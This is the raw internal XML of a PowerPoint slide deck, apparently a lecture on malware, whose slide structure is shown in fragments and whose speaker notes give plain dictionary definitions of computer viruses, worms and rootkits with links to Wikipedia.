  <Override PartName="/ppt/slides/slide99.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide126.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide98.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89.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide116.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide88.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide115.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114.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113.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide85.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide17.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide106.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide78.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30.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide129.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide31.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80.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide43.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide34.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide130.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide105.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide77.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81.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide35.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide131.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide128.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40.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide146.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide51.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide147.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide52.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide145.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide49.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide136.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide148.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide44.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide140.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide53.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide137.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide149.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide50.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide150.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide54.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide32.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide156.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide33.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide157.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide152.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide56.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide151.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide55.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide36.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide132.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide141.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide45.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142.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide46.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide144.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide48.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide39.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide135.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide38.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide134.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide143.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09.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107.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide153.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110.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide82.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide20.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide119.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide154.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111.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide83.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide21.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide155.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112.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide84.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide22.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide90.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide23.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide91.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120.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide24.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide92.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide68.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide25.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide121.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide93.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide69.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide26.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide122.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide9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100.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide72.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide101.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide73.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide102.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103.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide76.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide10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140" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide136.xml"/><Relationship Id="rId141" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide137.xml"/><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53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide149.xml"/><Relationship Id="rId154" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide150.xml"/><Relationship Id="rId155" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide151.xml"/><Relationship Id="rId156" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide152.xml"/><Relationship Id="rId157" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide153.xml"/><Relationship Id="rId158" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide154.xml"/><Relationship Id="rId159" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide155.xml"/><Relationship Id="rId160" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide156.xml"/><Relationship Id="rId161" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide157.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400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Click to move </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>the slide</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83"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a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>edit the </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>notes </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>format</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84"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85"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86"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8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EB103FF5-04F3-4F25-B98C-F912D4BCC9AB}"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hyperlink" Target="https://en.wikipedia.org/wiki/Malicious_software" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Quine_(computing)" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Computer_program" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Computer_virus#cite_note-Stallings_2012_p.182-1" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Malware" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Computer_program" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Software" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Malware" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Authentication" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Computer" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Home_router" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Cryptosystem" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Algorithm" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Chipset" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Intel_Active_Management_Technology" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Backdoor_(computing)#cite_note-1" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Backdoor_(computing)#cite_note-2" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Spyware#cite_note-FTC-REPORT-2005-1" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Plaintext" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Cryptographic_system" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide10.xml"/><Relationship Id="rId22"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hyperlink" Target="https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-dtyp/a66edeb1-52a0-4d64-a93b-2f5c833d7d92#gt_fd33af2e-e1ce-4f8e-a706-f9fb8123f9b0" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide111.xml"/><Relationship Id="rId3"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28.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
</Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide131.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
</Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide133.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
</Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide138.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
</Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide144.xml.rels><?xml version="1.0" encoding="UTF-8"?>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
</Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide149.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide149.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/>
</Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide150.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
</Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide152.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide152.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/>
</Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide154.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide154.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/>
</Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide156.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide156.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/>
</Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide157.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide15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PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="685800"/>
            <a:ext cx="4571640" cy="3428640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="751"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752"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F551C315-70F5-486F-80B8-7C5FB2B7C540}"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PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="685800"/>
            <a:ext cx="4571640" cy="3428640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="763" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4343400"/>
            <a:ext cx="5486040" cy="4114440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="171360" indent="-171000">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Calibri"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>computer virus</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t> is a type of </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>malicious software</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t> that, when executed, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>replicates</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t> itself by modifying other </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>computer programs</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t> and inserting its own code.</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike" u="sng" baseline="30000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>[1]</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t> When this replication succeeds, the affected areas are then said to be "infected" with a computer virus.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171360" indent="-171000">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Calibri"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>computer worm</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t> is a standalone </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>malware</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>computer program</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t> that replicates itself in order to spread to other computers</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171360" indent="-171000">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Calibri"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>rootkit</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t> is a collection of </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>computer software</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
